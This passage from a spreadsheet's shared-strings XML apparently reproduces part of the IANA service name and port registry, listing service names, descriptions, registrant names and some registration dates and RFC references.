    <t>A14 (AN-to-SC/MM)</t>
  </si>
  <si>
    <t>a15</t>
  </si>
  <si>
    <t>A15 (AN-to-AN)</t>
  </si>
  <si>
    <t>[David_Ott]</t>
  </si>
  <si>
    <t>quasar-server</t>
  </si>
  <si>
    <t>Quasar Accounting Server</t>
  </si>
  <si>
    <t>[Brad_Pepers]</t>
  </si>
  <si>
    <t>trap-daemon</t>
  </si>
  <si>
    <t>text relay-answer</t>
  </si>
  <si>
    <t>[John_Willis]</t>
  </si>
  <si>
    <t>visinet-gui</t>
  </si>
  <si>
    <t>Visinet Gui</t>
  </si>
  <si>
    <t>[Jeff_Douglass]</t>
  </si>
  <si>
    <t>infiniswitchcl</t>
  </si>
  <si>
    <t>InfiniSwitch Mgr Client</t>
  </si>
  <si>
    <t>[Lee_VanTine]</t>
  </si>
  <si>
    <t>int-rcv-cntrl</t>
  </si>
  <si>
    <t>Integrated Rcvr Control</t>
  </si>
  <si>
    <t>[Dave_Stone]</t>
  </si>
  <si>
    <t>bmc-jmx-port</t>
  </si>
  <si>
    <t>BMC JMX Port</t>
  </si>
  <si>
    <t>comcam-io</t>
  </si>
  <si>
    <t>ComCam IO Port</t>
  </si>
  <si>
    <t>splitlock</t>
  </si>
  <si>
    <t>Splitlock Server</t>
  </si>
  <si>
    <t>[Andrew_Tune]</t>
  </si>
  <si>
    <t>precise-i3</t>
  </si>
  <si>
    <t>Precise I3</t>
  </si>
  <si>
    <t>[Tomer_Shain]</t>
  </si>
  <si>
    <t>trendchip-dcp</t>
  </si>
  <si>
    <t>Trendchip control protocol</t>
  </si>
  <si>
    <t>[Ming_Jen_Chen]</t>
  </si>
  <si>
    <t>cpdi-pidas-cm</t>
  </si>
  <si>
    <t>CPDI PIDAS Connection Mon</t>
  </si>
  <si>
    <t>[Tony_Splaver]</t>
  </si>
  <si>
    <t>echonet</t>
  </si>
  <si>
    <t>ECHONET</t>
  </si>
  <si>
    <t>[Takeshi_Saito]</t>
  </si>
  <si>
    <t>six-degrees</t>
  </si>
  <si>
    <t>Six Degrees Port</t>
  </si>
  <si>
    <t>[Zach_Nies]</t>
  </si>
  <si>
    <t>dataprotector</t>
  </si>
  <si>
    <t>Micro Focus Data Protector</t>
  </si>
  <si>
    <t>[Micro_Focus]</t>
  </si>
  <si>
    <t>[Shishir_Misra]</t>
  </si>
  <si>
    <t>alaris-disc</t>
  </si>
  <si>
    <t>Alaris Device Discovery</t>
  </si>
  <si>
    <t>[Chris_Dern]</t>
  </si>
  <si>
    <t>sigma-port</t>
  </si>
  <si>
    <t>Satchwell Sigma</t>
  </si>
  <si>
    <t>[Dave_Chapman]</t>
  </si>
  <si>
    <t>start-network</t>
  </si>
  <si>
    <t>Start Messaging Network</t>
  </si>
  <si>
    <t>[Peter_Rocca]</t>
  </si>
  <si>
    <t>cd3o-protocol</t>
  </si>
  <si>
    <t>cd3o Control Protocol</t>
  </si>
  <si>
    <t>[Chris_Wilcox]</t>
  </si>
  <si>
    <t>sharp-server</t>
  </si>
  <si>
    <t>ATI SHARP Logic Engine</t>
  </si>
  <si>
    <t>[Bill_Reveile]</t>
  </si>
  <si>
    <t>aairnet-1</t>
  </si>
  <si>
    <t>AAIR-Network 1</t>
  </si>
  <si>
    <t>aairnet-2</t>
  </si>
  <si>
    <t>AAIR-Network 2</t>
  </si>
  <si>
    <t>[James_Mealey]</t>
  </si>
  <si>
    <t>ep-pcp</t>
  </si>
  <si>
    <t>EPSON Projector Control Port</t>
  </si>
  <si>
    <t>ep-nsp</t>
  </si>
  <si>
    <t>EPSON Network Screen Port</t>
  </si>
  <si>
    <t>[SEIKO_EPSON_3]</t>
  </si>
  <si>
    <t>ff-lr-port</t>
  </si>
  <si>
    <t>FF LAN Redundancy Port</t>
  </si>
  <si>
    <t>haipe-discover</t>
  </si>
  <si>
    <t>HAIPIS Dynamic Discovery</t>
  </si>
  <si>
    <t>[Mike_Irani]</t>
  </si>
  <si>
    <t>dist-upgrade</t>
  </si>
  <si>
    <t>Distributed Upgrade Port</t>
  </si>
  <si>
    <t>[Jason_Schoon]</t>
  </si>
  <si>
    <t>volley</t>
  </si>
  <si>
    <t>Volley</t>
  </si>
  <si>
    <t>[David_Catmull]</t>
  </si>
  <si>
    <t>bvcdaemon-port</t>
  </si>
  <si>
    <t>bvControl Daemon</t>
  </si>
  <si>
    <t>[Ravi_Gokhale]</t>
  </si>
  <si>
    <t>jamserverport</t>
  </si>
  <si>
    <t>Jam Server Port</t>
  </si>
  <si>
    <t>[Art_Pope]</t>
  </si>
  <si>
    <t>ept-machine</t>
  </si>
  <si>
    <t>EPT Machine Interface</t>
  </si>
  <si>
    <t>[Victor_H_Farrace]</t>
  </si>
  <si>
    <t>escvpnet</t>
  </si>
  <si>
    <t>ESC/VP.net</t>
  </si>
  <si>
    <t>[Hiroyuki_Hashimoto]</t>
  </si>
  <si>
    <t>cs-remote-db</t>
  </si>
  <si>
    <t>C&amp;S Remote Database Port</t>
  </si>
  <si>
    <t>cs-services</t>
  </si>
  <si>
    <t>C&amp;S Web Services Port</t>
  </si>
  <si>
    <t>[Computer_Software_Gm]</t>
  </si>
  <si>
    <t>distcc</t>
  </si>
  <si>
    <t>distributed compiler</t>
  </si>
  <si>
    <t>[Martin_Pool]</t>
  </si>
  <si>
    <t>2002-11</t>
  </si>
  <si>
    <t>wacp</t>
  </si>
  <si>
    <t>Wyrnix AIS port</t>
  </si>
  <si>
    <t>[Harry_T_Vennik]</t>
  </si>
  <si>
    <t>hlibmgr</t>
  </si>
  <si>
    <t>hNTSP Library Manager</t>
  </si>
  <si>
    <t>[Kenji_Tetsuyama]</t>
  </si>
  <si>
    <t>sdo</t>
  </si>
  <si>
    <t>Simple Distributed Objects</t>
  </si>
  <si>
    <t>[Alexander_Philippou]</t>
  </si>
  <si>
    <t>servistaitsm</t>
  </si>
  <si>
    <t>SerVistaITSM</t>
  </si>
  <si>
    <t>[Ralph_Campbell]</t>
  </si>
  <si>
    <t>scservp</t>
  </si>
  <si>
    <t>Customer Service Port</t>
  </si>
  <si>
    <t>[Jonathan_A_Zdziarsk]</t>
  </si>
  <si>
    <t>ehp-backup</t>
  </si>
  <si>
    <t>EHP Backup Protocol</t>
  </si>
  <si>
    <t>[Ed_Fair]</t>
  </si>
  <si>
    <t>xap-ha</t>
  </si>
  <si>
    <t>Extensible Automation</t>
  </si>
  <si>
    <t>[Mark_Harrison]</t>
  </si>
  <si>
    <t>netplay-port1</t>
  </si>
  <si>
    <t>Netplay Port 1</t>
  </si>
  <si>
    <t>netplay-port2</t>
  </si>
  <si>
    <t>Netplay Port 2</t>
  </si>
  <si>
    <t>[Predrag_Filipovic]</t>
  </si>
  <si>
    <t>juxml-port</t>
  </si>
  <si>
    <t>Juxml Replication port</t>
  </si>
  <si>
    <t>[Colin_Reid]</t>
  </si>
  <si>
    <t>audiojuggler</t>
  </si>
  <si>
    <t>AudioJuggler</t>
  </si>
  <si>
    <t>[Morten_Mertner]</t>
  </si>
  <si>
    <t>ssowatch</t>
  </si>
  <si>
    <t>cyc</t>
  </si>
  <si>
    <t>Cyc</t>
  </si>
  <si>
    <t>[Stephen_Reed]</t>
  </si>
  <si>
    <t>xss-srv-port</t>
  </si>
  <si>
    <t>XSS Server Port</t>
  </si>
  <si>
    <t>splitlock-gw</t>
  </si>
  <si>
    <t>Splitlock Gateway</t>
  </si>
  <si>
    <t>fjcp</t>
  </si>
  <si>
    <t>Fujitsu Cooperation Port</t>
  </si>
  <si>
    <t>[Kouji_Sugisawa]</t>
  </si>
  <si>
    <t>nmmp</t>
  </si>
  <si>
    <t>Nishioka Miyuki Msg Protocol</t>
  </si>
  <si>
    <t>[TAKEDA_Hiroyuki]</t>
  </si>
  <si>
    <t>prismiq-plugin</t>
  </si>
  <si>
    <t>PRISMIQ VOD plug-in</t>
  </si>
  <si>
    <t>[Richard_Hodges_3]</t>
  </si>
  <si>
    <t>xrpc-registry</t>
  </si>
  <si>
    <t>XRPC Registry</t>
  </si>
  <si>
    <t>[Slava_Monich]</t>
  </si>
  <si>
    <t>vxcrnbuport</t>
  </si>
  <si>
    <t>VxCR NBU Default Port</t>
  </si>
  <si>
    <t>[Boris_Star]</t>
  </si>
  <si>
    <t>tsp</t>
  </si>
  <si>
    <t>Tunnel Setup Protocol</t>
  </si>
  <si>
    <t>[Marc_Blanchet]</t>
  </si>
  <si>
    <t>[RFC5572]</t>
  </si>
  <si>
    <t>vaprtm</t>
  </si>
  <si>
    <t>VAP RealTime Messenger</t>
  </si>
  <si>
    <t>[Boris_Polevoy]</t>
  </si>
  <si>
    <t>abatemgr</t>
  </si>
  <si>
    <t>ActiveBatch Exec Agent</t>
  </si>
  <si>
    <t>abatjss</t>
  </si>
  <si>
    <t>ActiveBatch Job Scheduler</t>
  </si>
  <si>
    <t>[Ben_Rosenberg]</t>
  </si>
  <si>
    <t>immedianet-bcn</t>
  </si>
  <si>
    <t>ImmediaNet Beacon</t>
  </si>
  <si>
    <t>[Bill_Homan]</t>
  </si>
  <si>
    <t>ps-ams</t>
  </si>
  <si>
    <t>PlayStation AMS (Secure)</t>
  </si>
  <si>
    <t>[Edgar_Alan_Tu]</t>
  </si>
  <si>
    <t>apple-sasl</t>
  </si>
  <si>
    <t>Apple SASL</t>
  </si>
  <si>
    <t>[David_M_O_Rourke]</t>
  </si>
  <si>
    <t>can-nds-ssl</t>
  </si>
  <si>
    <t>IBM Tivoli Directory Service using SSL</t>
  </si>
  <si>
    <t>can-ferret-ssl</t>
  </si>
  <si>
    <t>pserver</t>
  </si>
  <si>
    <t>[Patrick_Furlong]</t>
  </si>
  <si>
    <t>dtp</t>
  </si>
  <si>
    <t>DIRECWAY Tunnel Protocol</t>
  </si>
  <si>
    <t>ups-engine</t>
  </si>
  <si>
    <t>UPS Engine Port</t>
  </si>
  <si>
    <t>ent-engine</t>
  </si>
  <si>
    <t>Enterprise Engine Port</t>
  </si>
  <si>
    <t>[Mike_Delgrosso]</t>
  </si>
  <si>
    <t>eserver-pap</t>
  </si>
  <si>
    <t>IBM eServer PAP</t>
  </si>
  <si>
    <t>[Dave_Gimpl]</t>
  </si>
  <si>
    <t>IBM EServer PAP</t>
  </si>
  <si>
    <t>infoexch</t>
  </si>
  <si>
    <t>IBM Information Exchange</t>
  </si>
  <si>
    <t>dell-rm-port</t>
  </si>
  <si>
    <t>Dell Remote Management</t>
  </si>
  <si>
    <t>[Bradley_Bransom]</t>
  </si>
  <si>
    <t>casanswmgmt</t>
  </si>
  <si>
    <t>CA SAN Switch Management</t>
  </si>
  <si>
    <t>[Emre_Tunar]</t>
  </si>
  <si>
    <t>smile</t>
  </si>
  <si>
    <t>SMILE TCP/UDP Interface</t>
  </si>
  <si>
    <t>[Andre_Petras]</t>
  </si>
  <si>
    <t>efcp</t>
  </si>
  <si>
    <t>e Field Control (EIBnet)</t>
  </si>
  <si>
    <t>[Marc_Goossens]</t>
  </si>
  <si>
    <t>lispworks-orb</t>
  </si>
  <si>
    <t>LispWorks ORB</t>
  </si>
  <si>
    <t>[Lisp_Support]</t>
  </si>
  <si>
    <t>mediavault-gui</t>
  </si>
  <si>
    <t>Openview Media Vault GUI</t>
  </si>
  <si>
    <t>[Stephen_Gold]</t>
  </si>
  <si>
    <t>wininstall-ipc</t>
  </si>
  <si>
    <t>WinINSTALL IPC Port</t>
  </si>
  <si>
    <t>[Bill_Somerville]</t>
  </si>
  <si>
    <t>calltrax</t>
  </si>
  <si>
    <t>CallTrax Data Port</t>
  </si>
  <si>
    <t>[Oliver_Bailey]</t>
  </si>
  <si>
    <t>va-pacbase</t>
  </si>
  <si>
    <t>VisualAge Pacbase server</t>
  </si>
  <si>
    <t>[Dominique_Lelievre]</t>
  </si>
  <si>
    <t>roverlog</t>
  </si>
  <si>
    <t>RoverLog IPC</t>
  </si>
  <si>
    <t>[Tom_Mayo]</t>
  </si>
  <si>
    <t>ipr-dglt</t>
  </si>
  <si>
    <t>DataGuardianLT</t>
  </si>
  <si>
    <t>[Bruce_Carlson]</t>
  </si>
  <si>
    <t>Escale (Newton Dock)</t>
  </si>
  <si>
    <t>Newton Dock</t>
  </si>
  <si>
    <t>[Paul_Guyot]</t>
  </si>
  <si>
    <t>npds-tracker</t>
  </si>
  <si>
    <t>NPDS Tracker</t>
  </si>
  <si>
    <t>bts-x73</t>
  </si>
  <si>
    <t>BTS X73 Port</t>
  </si>
  <si>
    <t>[Todd_Cooper]</t>
  </si>
  <si>
    <t>cas-mapi</t>
  </si>
  <si>
    <t>EMC SmartPackets-MAPI</t>
  </si>
  <si>
    <t>[Koen_Schoofs]</t>
  </si>
  <si>
    <t>bmc-ea</t>
  </si>
  <si>
    <t>BMC EDV/EA</t>
  </si>
  <si>
    <t>faxstfx-port</t>
  </si>
  <si>
    <t>FAXstfX</t>
  </si>
  <si>
    <t>[Alec_Carlson]</t>
  </si>
  <si>
    <t>dsx-agent</t>
  </si>
  <si>
    <t>DS Expert Agent</t>
  </si>
  <si>
    <t>tnmpv2</t>
  </si>
  <si>
    <t>Trivial Network Management</t>
  </si>
  <si>
    <t>[Andrea_Premoli]</t>
  </si>
  <si>
    <t>simple-push</t>
  </si>
  <si>
    <t>simple-push-s</t>
  </si>
  <si>
    <t>simple-push Secure</t>
  </si>
  <si>
    <t>[C_Enrique_Ortiz]</t>
  </si>
  <si>
    <t>daap</t>
  </si>
  <si>
    <t>Digital Audio Access Protocol (iTunes)</t>
  </si>
  <si>
    <t>[Amandeep_Jawa]</t>
  </si>
  <si>
    <t>Defined TXT keys: txtvers, Version, iTSh Version, Machine ID, Database ID, Machine Name, Password</t>
  </si>
  <si>
    <t>svn</t>
  </si>
  <si>
    <t>Subversion</t>
  </si>
  <si>
    <t>[Greg_Hudson_2]</t>
  </si>
  <si>
    <t>magaya-network</t>
  </si>
  <si>
    <t>Magaya Network Port</t>
  </si>
  <si>
    <t>[Jesus_David_Rodrigue]</t>
  </si>
  <si>
    <t>2003-02</t>
  </si>
  <si>
    <t>intelsync</t>
  </si>
  <si>
    <t>Brimstone IntelSync</t>
  </si>
  <si>
    <t>[Davey_Taylor]</t>
  </si>
  <si>
    <t>easl</t>
  </si>
  <si>
    <t>Emergency Automatic Structure Lockdown System</t>
  </si>
  <si>
    <t>[Mele_Associates]</t>
  </si>
  <si>
    <t>[Greg_Hansen][Randy_Yates]</t>
  </si>
  <si>
    <t>This port was previously removed on 2007-04-05.</t>
  </si>
  <si>
    <t>bmc-data-coll</t>
  </si>
  <si>
    <t>BMC Data Collection</t>
  </si>
  <si>
    <t>telnetcpcd</t>
  </si>
  <si>
    <t>Telnet Com Port Control</t>
  </si>
  <si>
    <t>[Thomas_J_Pinkl]</t>
  </si>
  <si>
    <t>nw-license</t>
  </si>
  <si>
    <t>NavisWorks License System</t>
  </si>
  <si>
    <t>[Tim_Wiegand]</t>
  </si>
  <si>
    <t>sagectlpanel</t>
  </si>
  <si>
    <t>SAGECTLPANEL</t>
  </si>
  <si>
    <t>[Mark_Gamble]</t>
  </si>
  <si>
    <t>kpn-icw</t>
  </si>
  <si>
    <t>Internet Call Waiting</t>
  </si>
  <si>
    <t>[B_J_Kortekaas]</t>
  </si>
  <si>
    <t>lrs-paging</t>
  </si>
  <si>
    <t>LRS NetPage</t>
  </si>
  <si>
    <t>[Geoffrey_Wossum]</t>
  </si>
  <si>
    <t>netcelera</t>
  </si>
  <si>
    <t>NetCelera</t>
  </si>
  <si>
    <t>[Tarek_Nabhan]</t>
  </si>
  <si>
    <t>ws-discovery</t>
  </si>
  <si>
    <t>Web Service Discovery</t>
  </si>
  <si>
    <t>[Christian_Huitema_2]</t>
  </si>
  <si>
    <t>adobeserver-3</t>
  </si>
  <si>
    <t>Adobe Server 3</t>
  </si>
  <si>
    <t>adobeserver-4</t>
  </si>
  <si>
    <t>Adobe Server 4</t>
  </si>
  <si>
    <t>adobeserver-5</t>
  </si>
  <si>
    <t>Adobe Server 5</t>
  </si>
  <si>
    <t>[Bernd_Paradies]</t>
  </si>
  <si>
    <t>rt-event</t>
  </si>
  <si>
    <t>Real-Time Event Port</t>
  </si>
  <si>
    <t>rt-event-s</t>
  </si>
  <si>
    <t>Real-Time Event Secure Port</t>
  </si>
  <si>
    <t>[Terry_Gin]</t>
  </si>
  <si>
    <t>sun-as-iiops</t>
  </si>
  <si>
    <t>Sun App Svr - Naming</t>
  </si>
  <si>
    <t>[Abhijit_Kumar]</t>
  </si>
  <si>
    <t>ca-idms</t>
  </si>
  <si>
    <t>CA-IDMS Server</t>
  </si>
  <si>
    <t>[Dave_Ross]</t>
  </si>
  <si>
    <t>portgate-auth</t>
  </si>
  <si>
    <t>PortGate Authentication</t>
  </si>
  <si>
    <t>[Scott_Harris]</t>
  </si>
  <si>
    <t>edb-server2</t>
  </si>
  <si>
    <t>EBD Server 2</t>
  </si>
  <si>
    <t>sentinel-ent</t>
  </si>
  <si>
    <t>Sentinel Enterprise</t>
  </si>
  <si>
    <t>[Ian_Gordon_2]</t>
  </si>
  <si>
    <t>tftps</t>
  </si>
  <si>
    <t>TFTP over TLS</t>
  </si>
  <si>
    <t>[Mark_mayernick]</t>
  </si>
  <si>
    <t>delos-dms</t>
  </si>
  <si>
    <t>DELOS Direct Messaging</t>
  </si>
  <si>
    <t>[Ekkehard_Morgenstern]</t>
  </si>
  <si>
    <t>anoto-rendezv</t>
  </si>
  <si>
    <t>Anoto Rendezvous Port</t>
  </si>
  <si>
    <t>[Ola_Sandstrom]</t>
  </si>
  <si>
    <t>wv-csp-sms-cir</t>
  </si>
  <si>
    <t>WV CSP SMS CIR Channel</t>
  </si>
  <si>
    <t>wv-csp-udp-cir</t>
  </si>
  <si>
    <t>WV CSP UDP/IP CIR Channel</t>
  </si>
  <si>
    <t>[Jon_Ingi_Ingimundars]</t>
  </si>
  <si>
    <t>opus-services</t>
  </si>
  <si>
    <t>OPUS Server Port</t>
  </si>
  <si>
    <t>[Detlef_Stoever]</t>
  </si>
  <si>
    <t>itelserverport</t>
  </si>
  <si>
    <t>iTel Server Port</t>
  </si>
  <si>
    <t>[Mark_Hendricks]</t>
  </si>
  <si>
    <t>ufastro-instr</t>
  </si>
  <si>
    <t>UF Astro. Instr. Services</t>
  </si>
  <si>
    <t>[David_B_Hon]</t>
  </si>
  <si>
    <t>xsync</t>
  </si>
  <si>
    <t>Xsync</t>
  </si>
  <si>
    <t>xserveraid</t>
  </si>
  <si>
    <t>Xserve RAID</t>
  </si>
  <si>
    <t>[Bob_Bradley]</t>
  </si>
  <si>
    <t>sychrond</t>
  </si>
  <si>
    <t>Sychron Service Daemon</t>
  </si>
  <si>
    <t>[Robert_Marinelli]</t>
  </si>
  <si>
    <t>blizwow</t>
  </si>
  <si>
    <t>World of Warcraft</t>
  </si>
  <si>
    <t>na-er-tip</t>
  </si>
  <si>
    <t>Netia NA-ER Port</t>
  </si>
  <si>
    <t>[Jean_Pierre_Garcia]</t>
  </si>
  <si>
    <t>array-manager</t>
  </si>
  <si>
    <t>Xyratex Array Manager</t>
  </si>
  <si>
    <t>[David_A_Lethe]</t>
  </si>
  <si>
    <t>e-mdu</t>
  </si>
  <si>
    <t>Ericsson Mobile Data Unit</t>
  </si>
  <si>
    <t>e-woa</t>
  </si>
  <si>
    <t>Ericsson Web on Air</t>
  </si>
  <si>
    <t>[Marco_Casole]</t>
  </si>
  <si>
    <t>fksp-audit</t>
  </si>
  <si>
    <t>Fireking Audit Port</t>
  </si>
  <si>
    <t>[Richard_Thurman]</t>
  </si>
  <si>
    <t>client-ctrl</t>
  </si>
  <si>
    <t>Client Control</t>
  </si>
  <si>
    <t>[Lawrence_W_Dunn]</t>
  </si>
  <si>
    <t>smap</t>
  </si>
  <si>
    <t>Service Manager</t>
  </si>
  <si>
    <t>m-wnn</t>
  </si>
  <si>
    <t>Mobile Wnn</t>
  </si>
  <si>
    <t>multip-msg</t>
  </si>
  <si>
    <t>Multipuesto Msg Port</t>
  </si>
  <si>
    <t>[Felisa_Ares]</t>
  </si>
  <si>
    <t>synel-data</t>
  </si>
  <si>
    <t>Synel Data Collection Port</t>
  </si>
  <si>
    <t>[David_Ashkenazi]</t>
  </si>
  <si>
    <t>pwdis</t>
  </si>
  <si>
    <t>Password Distribution</t>
  </si>
  <si>
    <t>[Robert_Erl]</t>
  </si>
  <si>
    <t>rs-rmi</t>
  </si>
  <si>
    <t>RealSpace RMI</t>
  </si>
  <si>
    <t>[Barry_McDarby]</t>
  </si>
  <si>
    <t>xpanel</t>
  </si>
  <si>
    <t>XPanel Daemon</t>
  </si>
  <si>
    <t>[Lilian_Rudenco]</t>
  </si>
  <si>
    <t>versatalk</t>
  </si>
  <si>
    <t>versaTalk Server Port</t>
  </si>
  <si>
    <t>[Dr_Kingsley_C_Nwos]</t>
  </si>
  <si>
    <t>launchbird-lm</t>
  </si>
  <si>
    <t>Launchbird LicenseManager</t>
  </si>
  <si>
    <t>[Tom_Hawkins]</t>
  </si>
  <si>
    <t>heartbeat</t>
  </si>
  <si>
    <t>Heartbeat Protocol</t>
  </si>
  <si>
    <t>[Jeroen_Massar]</t>
  </si>
  <si>
    <t>wysdma</t>
  </si>
  <si>
    <t>WysDM Agent</t>
  </si>
  <si>
    <t>[Jim_McDonald]</t>
  </si>
  <si>
    <t>cst-port</t>
  </si>
  <si>
    <t>CST - Configuration &amp; Service Tracker</t>
  </si>
  <si>
    <t>[Hai_Ou_Yang]</t>
  </si>
  <si>
    <t>ipcs-command</t>
  </si>
  <si>
    <t>IP Control Systems Ltd.</t>
  </si>
  <si>
    <t>[Paul_Anderson]</t>
  </si>
  <si>
    <t>sasg</t>
  </si>
  <si>
    <t>SASG</t>
  </si>
  <si>
    <t>[Cristian_Petculescu_2]</t>
  </si>
  <si>
    <t>gw-call-port</t>
  </si>
  <si>
    <t>GWRTC Call Port</t>
  </si>
  <si>
    <t>linktest</t>
  </si>
  <si>
    <t>LXPRO.COM LinkTest</t>
  </si>
  <si>
    <t>linktest-s</t>
  </si>
  <si>
    <t>LXPRO.COM LinkTest SSL</t>
  </si>
  <si>
    <t>webdata</t>
  </si>
  <si>
    <t>webData</t>
  </si>
  <si>
    <t>[Michael_Whiteley]</t>
  </si>
  <si>
    <t>cimtrak</t>
  </si>
  <si>
    <t>CimTrak</t>
  </si>
  <si>
    <t>[Robert_E_Johnson_II]</t>
  </si>
  <si>
    <t>cbos-ip-port</t>
  </si>
  <si>
    <t>CBOS/IP ncapsalation port</t>
  </si>
  <si>
    <t>[Thomas_Dannemiller]</t>
  </si>
  <si>
    <t>gprs-cube</t>
  </si>
  <si>
    <t>CommLinx GPRS Cube</t>
  </si>
  <si>
    <t>vipremoteagent</t>
  </si>
  <si>
    <t>Vigil-IP RemoteAgent</t>
  </si>
  <si>
    <t>[Bryan_Alvord]</t>
  </si>
  <si>
    <t>nattyserver</t>
  </si>
  <si>
    <t>NattyServer Port</t>
  </si>
  <si>
    <t>[Akira_Saito]</t>
  </si>
  <si>
    <t>timestenbroker</t>
  </si>
  <si>
    <t>TimesTen Broker Port</t>
  </si>
  <si>
    <t>[David_Aspinwall]</t>
  </si>
  <si>
    <t>sas-remote-hlp</t>
  </si>
  <si>
    <t>SAS Remote Help Server</t>
  </si>
  <si>
    <t>[Gary_T_Ciampa]</t>
  </si>
  <si>
    <t>canon-capt</t>
  </si>
  <si>
    <t>Canon CAPT Port</t>
  </si>
  <si>
    <t>[Takashi_Okazawa]</t>
  </si>
  <si>
    <t>grf-port</t>
  </si>
  <si>
    <t>GRF Server Port</t>
  </si>
  <si>
    <t>[Robert_Banfill]</t>
  </si>
  <si>
    <t>apw-registry</t>
  </si>
  <si>
    <t>apw RMI registry</t>
  </si>
  <si>
    <t>[Dan_Davis]</t>
  </si>
  <si>
    <t>exapt-lmgr</t>
  </si>
  <si>
    <t>Exapt License Manager</t>
  </si>
  <si>
    <t>[Christoph_Kukulies]</t>
  </si>
  <si>
    <t>adtempusclient</t>
  </si>
  <si>
    <t>adTempus Client</t>
  </si>
  <si>
    <t>[Bill_Wingate]</t>
  </si>
  <si>
    <t>2003-05</t>
  </si>
  <si>
    <t>adTEmpus Client</t>
  </si>
  <si>
    <t>gsakmp</t>
  </si>
  <si>
    <t>gsakmp port</t>
  </si>
  <si>
    <t>[RFC4535]</t>
  </si>
  <si>
    <t>gbs-smp</t>
  </si>
  <si>
    <t>GBS SnapMail Protocol</t>
  </si>
  <si>
    <t>2003-06</t>
  </si>
  <si>
    <t>xo-wave</t>
  </si>
  <si>
    <t>XO Wave Control Port</t>
  </si>
  <si>
    <t>[Bjorn_Dittmer_Roche]</t>
  </si>
  <si>
    <t>mni-prot-rout</t>
  </si>
  <si>
    <t>MNI Protected Routing</t>
  </si>
  <si>
    <t>[Tim_Behne]</t>
  </si>
  <si>
    <t>rtraceroute</t>
  </si>
  <si>
    <t>Remote Traceroute</t>
  </si>
  <si>
    <t>[A_Blake_Cooper]</t>
  </si>
  <si>
    <t>sitewatch-s</t>
  </si>
  <si>
    <t>SSL e-watch sitewatch server</t>
  </si>
  <si>
    <t>[e-Watch_Corporation]</t>
  </si>
  <si>
    <t>[John_M_Baird_2]</t>
  </si>
  <si>
    <t>this port was previously updated on 2009-06-19</t>
  </si>
  <si>
    <t>listmgr-port</t>
  </si>
  <si>
    <t>ListMGR Port</t>
  </si>
  <si>
    <t>[Takashi_Kubota]</t>
  </si>
  <si>
    <t>rblcheckd</t>
  </si>
  <si>
    <t>rblcheckd server daemon</t>
  </si>
  <si>
    <t>[Sabri_Berisha]</t>
  </si>
  <si>
    <t>haipe-otnk</t>
  </si>
  <si>
    <t>HAIPE Network Keying</t>
  </si>
  <si>
    <t>[Mike_Irani_2]</t>
  </si>
  <si>
    <t>cindycollab</t>
  </si>
  <si>
    <t>Cinderella Collaboration</t>
  </si>
  <si>
    <t>[Ulrich_Kortenkamp]</t>
  </si>
  <si>
    <t>paging-port</t>
  </si>
  <si>
    <t>RTP Paging Port</t>
  </si>
  <si>
    <t>[Patrick_Ferriter]</t>
  </si>
  <si>
    <t>ctp</t>
  </si>
  <si>
    <t>Chantry Tunnel Protocol</t>
  </si>
  <si>
    <t>[Inderpreet_Singh]</t>
  </si>
  <si>
    <t>ctdhercules</t>
  </si>
  <si>
    <t>[Carl_Banzhof]</t>
  </si>
  <si>
    <t>zicom</t>
  </si>
  <si>
    <t>ZICOM</t>
  </si>
  <si>
    <t>[Sabu_Das]</t>
  </si>
  <si>
    <t>ispmmgr</t>
  </si>
  <si>
    <t>ISPM Manager Port</t>
  </si>
  <si>
    <t>[Eric_Anderson]</t>
  </si>
  <si>
    <t>dvcprov-port</t>
  </si>
  <si>
    <t>Device Provisioning Port</t>
  </si>
  <si>
    <t>[Rob_Lehew]</t>
  </si>
  <si>
    <t>jibe-eb</t>
  </si>
  <si>
    <t>Jibe EdgeBurst</t>
  </si>
  <si>
    <t>[Chap_Tippin]</t>
  </si>
  <si>
    <t>c-h-it-port</t>
  </si>
  <si>
    <t>Cutler-Hammer IT Port</t>
  </si>
  <si>
    <t>[Thomas_Ruchti]</t>
  </si>
  <si>
    <t>cognima</t>
  </si>
  <si>
    <t>Cognima Replication</t>
  </si>
  <si>
    <t>[Ralph_Greenwell]</t>
  </si>
  <si>
    <t>nnp</t>
  </si>
  <si>
    <t>Nuzzler Network Protocol</t>
  </si>
  <si>
    <t>[Andreas_Schwarz_2]</t>
  </si>
  <si>
    <t>abcvoice-port</t>
  </si>
  <si>
    <t>ABCvoice server port</t>
  </si>
  <si>
    <t>[Carlos_Gonzalez_Roma]</t>
  </si>
  <si>
    <t>iso-tp0s</t>
  </si>
  <si>
    <t>Secure ISO TP0 port</t>
  </si>
  <si>
    <t>[Herbert_Falk]</t>
  </si>
  <si>
    <t>bim-pem</t>
  </si>
  <si>
    <t>Impact Mgr./PEM Gateway</t>
  </si>
  <si>
    <t>[Walter_G_Giroir]</t>
  </si>
  <si>
    <t>2003-07</t>
  </si>
  <si>
    <t>bfd-control</t>
  </si>
  <si>
    <t>BFD Control Protocol</t>
  </si>
  <si>
    <t>[RFC5881]</t>
  </si>
  <si>
    <t>bfd-echo</t>
  </si>
  <si>
    <t>BFD Echo Protocol</t>
  </si>
  <si>
    <t>upstriggervsw</t>
  </si>
  <si>
    <t>VSW Upstrigger port</t>
  </si>
  <si>
    <t>[Mark_Tim_Junghanns]</t>
  </si>
  <si>
    <t>fintrx</t>
  </si>
  <si>
    <t>Fintrx</t>
  </si>
  <si>
    <t>[Peter_G_L_Potgiese]</t>
  </si>
  <si>
    <t>isrp-port</t>
  </si>
  <si>
    <t>SPACEWAY Routing port</t>
  </si>
  <si>
    <t>[Vaibhav_Kumar]</t>
  </si>
  <si>
    <t>remotedeploy</t>
  </si>
  <si>
    <t>RemoteDeploy Administration Port [July 2003]</t>
  </si>
  <si>
    <t>quickbooksrds</t>
  </si>
  <si>
    <t>QuickBooks RDS</t>
  </si>
  <si>
    <t>[Almira]</t>
  </si>
  <si>
    <t>tvnetworkvideo</t>
  </si>
  <si>
    <t>TV NetworkVideo Data port</t>
  </si>
  <si>
    <t>[Kevin_Brunner]</t>
  </si>
  <si>
    <t>sitewatch</t>
  </si>
  <si>
    <t>e-Watch Corporation SiteWatch</t>
  </si>
  <si>
    <t>[John_M_Baird]</t>
  </si>
  <si>
    <t>dcsoftware</t>
  </si>
  <si>
    <t>DataCore Software</t>
  </si>
  <si>
    <t>[Andre_Cato]</t>
  </si>
  <si>
    <t>jaus</t>
  </si>
  <si>
    <t>JAUS Robots</t>
  </si>
  <si>
    <t>myblast</t>
  </si>
  <si>
    <t>myBLAST Mekentosj port</t>
  </si>
  <si>
    <t>[Alexander_Griekspoor]</t>
  </si>
  <si>
    <t>spw-dialer</t>
  </si>
  <si>
